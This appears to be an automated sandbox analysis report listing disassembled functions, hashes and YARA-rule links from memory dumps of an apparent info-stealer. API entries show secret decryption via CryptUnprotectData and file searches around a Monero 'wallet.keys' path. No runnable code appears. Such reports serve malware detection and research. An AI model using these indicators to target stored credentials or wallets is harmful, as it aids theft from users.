                              • String ID: I;$`k;$~N+$V7[
                              • API String ID: 0-2527083691
                              • Opcode ID: 644147d9961457421d9a8a08048ee3f381c6a210bcd7b31020c43a1380aaad8b
                              • Instruction ID: 25d7af1305f616f7d1d78888fcb0f4e4d983f713c904215c3b910fab205d8d1e
                              • Opcode Fuzzy Hash: 644147d9961457421d9a8a08048ee3f381c6a210bcd7b31020c43a1380aaad8b
                              • Instruction Fuzzy Hash: 8C32D2F350C200AFE315AE29EC8577ABBE5EF94720F1A892DE6C4C7744E63598408797
                              Function 0110916B Relevance: 5.4, Strings: 3, Instructions: 1645COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: "{/$D}}$ot
                              • API String ID: 0-378467387
                              • Opcode ID: 64c290e8ebfd969acf0ace3a9ee1abb3e0e2d8e1fc8ab28df4dd9e0eeae713ba
                              • Instruction ID: 75c85bd24acb5eb0a862cdac1ea0052d09f289b6b3435d0c0e0c32dd413651a9
                              • Opcode Fuzzy Hash: 64c290e8ebfd969acf0ace3a9ee1abb3e0e2d8e1fc8ab28df4dd9e0eeae713ba
                              • Instruction Fuzzy Hash: 9BA24DF3608204AFE3046E2DEC8567BBBD9EFD4720F1A863DEAC4D3744E93558058696
                              Function 01102841 Relevance: 5.3, Strings: 3, Instructions: 1593COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: @<{h$T;Y5$im7
                              • API String ID: 0-4077018143
                              • Opcode ID: 4706343f72d17441be2008658873c9ef571c35158150485dec8adfb4ee91baec
                              • Instruction ID: 520be446ebf35862908e062f7a1fc56e8f29840be91baee7894b7aa82c67b05b
                              • Opcode Fuzzy Hash: 4706343f72d17441be2008658873c9ef571c35158150485dec8adfb4ee91baec
                              • Instruction Fuzzy Hash: 77B2F8F3A0C2049FE304AE2DEC8567ABBE9EF94720F16453DEAC4C7744EA3558058697
                              Function 00D43720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(00D4E118,00000000,00000001,00D4E108,00000000), ref: 00D43758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00D437B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                              • Instruction ID: e2204b18fa239e4a8b4bdf36829aa95afe1dea6f295647ffcd10ed4ceafda9e1
                              • Opcode Fuzzy Hash: ed431a7ff9823f93bfd929b5a2d7bcce5411d68bbca71bd4fbebe05b11e22981
                              • Instruction Fuzzy Hash: 6E41D670A40A28AFDB24DB58CC95B9BB7B5BB48702F5041D8E618A7290D771AE85CF60
                              Function 00D39B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00D39B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00D39BA3
                              • LocalFree.KERNEL32(?), ref: 00D39BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 7e383ad55746751b5009005ab7190ed4d7440bcfbb631b3427151f66636cd82c
                              • Instruction ID: e027b9149c6e8b1c79dc36142611f0151a28cc159a815c2f995ddeb0e0c27f24
                              • Opcode Fuzzy Hash: 7e383ad55746751b5009005ab7190ed4d7440bcfbb631b3427151f66636cd82c
                              • Instruction Fuzzy Hash: 7111CCB8A00209DFDB04DF94D985AAEB7B9FF88300F104558E91597354D774AE51CF62
                              Function 01105BCC Relevance: 4.0, Strings: 2, Instructions: 1546COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: -To}$}p][
                              • API String ID: 0-2228264133
                              • Opcode ID: 3dfe5360321b6fe9235dccd130d6a250ba0b65d968ce404514bda9c88dfa792d
                              • Instruction ID: d16ce5f7b32333fe94e63a97c70f4318c244a7b6af3a8da21c79b8715a5f1675
                              • Opcode Fuzzy Hash: 3dfe5360321b6fe9235dccd130d6a250ba0b65d968ce404514bda9c88dfa792d
                              • Instruction Fuzzy Hash: C7A2F3F360C2049FE3046F2DEC8567ABBE9EF94720F1A493DE6C487740EA3598458697
                              Function 01107E1D Relevance: 3.5, Strings: 2, Instructions: 965COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: I{$f02<
                              • API String ID: 0-3195043514
                              • Opcode ID: 8bd004c995bd4cb26dc8c519bd316e2c3d0f577b0e7ba96f43b4ccf7c1eb5612
                              • Instruction ID: 793073d98fc2a1959791a493c43dff6a714e86d3ef6f807cd459d689790a34b0
                              • Opcode Fuzzy Hash: 8bd004c995bd4cb26dc8c519bd316e2c3d0f577b0e7ba96f43b4ccf7c1eb5612
                              • Instruction Fuzzy Hash: 85525CF360C2049FE7046E2DED8577AFBDAEBD4220F1A463DEAC4C3744E93598058696
                              Function 00D3F68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00D4A740: lstrcpy.KERNEL32(00D50E17,00000000), ref: 00D4A788
                                • Part of subcall function 00D4A920: lstrcpy.KERNEL32(00000000,?), ref: 00D4A972
                                • Part of subcall function 00D4A920: lstrcat.KERNEL32(00000000), ref: 00D4A982
                                • Part of subcall function 00D4A9B0: lstrlen.KERNEL32(?,008D8A30,?,\Monero\wallet.keys,00D50E17), ref: 00D4A9C5
                                • Part of subcall function 00D4A9B0: lstrcpy.KERNEL32(00000000), ref: 00D4AA04
                                • Part of subcall function 00D4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00D4AA12
                                • Part of subcall function 00D4A8A0: lstrcpy.KERNEL32(?,00D50E17), ref: 00D4A905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00D515B8,00D50D96), ref: 00D3F71E
                              • StrCmpCA.SHLWAPI(?,00D515BC), ref: 00D3F76F
                              • StrCmpCA.SHLWAPI(?,00D515C0), ref: 00D3F785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00D3FAB1
                              • FindClose.KERNEL32(000000FF), ref: 00D3FAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: db4c2312390718a34b06ff9c57f818459288f0e8e9c43daca1304eb149fea88b
                              • Instruction ID: 85dcdc0e2fe04e797574b7770637834f484a0d05625f06f6faf6eb83b190ef00
                              • Opcode Fuzzy Hash: db4c2312390718a34b06ff9c57f818459288f0e8e9c43daca1304eb149fea88b
                              • Instruction Fuzzy Hash: C311D63184411DABEB24FBB4DC559ED7338EF10300F4146AAA50A57092EF302B4ACBB2
                              Function 010DFE83 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: *11
                              • API String ID: 0-2724586490
                              • Opcode ID: bcd48a966f0a6e28d461de43bb88be00aaa52653428a0194975b3cdb6d519b05
                              • Instruction ID: 34e5a8a765f459e5a56d28772d03a298e9417a0effe55caacbf24f0f03129814
                              • Opcode Fuzzy Hash: bcd48a966f0a6e28d461de43bb88be00aaa52653428a0194975b3cdb6d519b05
                              • Instruction Fuzzy Hash: D35104B3D087149FE3146A18DC8976BF7D9EF94320F1B4A3DDAD893380EA795C018696
                              Function 0105B1E0 Relevance: .2, Instructions: 196COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 81a3676bc8924aa74720fe9dbe13dabcf8e85acb1260b92d7c544ca5fce92878
                              • Instruction ID: 961130928ad733cebf67641350db73162bf567797d0b8f4bdbf624fcfc74086f
                              • Opcode Fuzzy Hash: 81a3676bc8924aa74720fe9dbe13dabcf8e85acb1260b92d7c544ca5fce92878
                              • Instruction Fuzzy Hash: 285135F3A182105BF3085929DD5A77AB7DADBD4620F2B423DEA49D3B88EC3958064186
                              Function 0101571F Relevance: .2, Instructions: 184COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 3757b5cb15738641c5d558c933e3ef318f0cafdbbde5031a9f900ba1ef9f9ebd
                              • Instruction ID: f88fcefcedc0300a507d291151cf4e8662923540f47898c41bad804425b1a771
                              • Opcode Fuzzy Hash: 3757b5cb15738641c5d558c933e3ef318f0cafdbbde5031a9f900ba1ef9f9ebd
                              • Instruction Fuzzy Hash: 685103B3A086149FF3047A28DC467BEB7E5EF90320F1B493DDAD593780EA3958408786
                              Function 0118400A Relevance: .1, Instructions: 97COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2121105174.0000000001116000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.00000000011F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001218000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121435599.0000000001229000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121551459.00000000013C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121571129.00000000013C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_d30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c16933fcdad73f3fe5ffd7f36e59f25cca1d6a3ec882f2bcfc31c4bef0e2e2f
                              • Instruction ID: 6aa3eb89005d94d404e2e85af874c29b59563916ff078a05ab11fb4ca4701134
                              • Opcode Fuzzy Hash: 9c16933fcdad73f3fe5ffd7f36e59f25cca1d6a3ec882f2bcfc31c4bef0e2e2f
                              • Instruction Fuzzy Hash: 5F315BB291C214DFD705BF29D8812BEFBE9EF94310F16482DEAC493254EA7198418B87
                              Function 00D49750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                              • Associated: 00000000.00000002.2120913969.0000000000D30000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000DED000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000E12000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2120930222.0000000000F7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2121105174.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
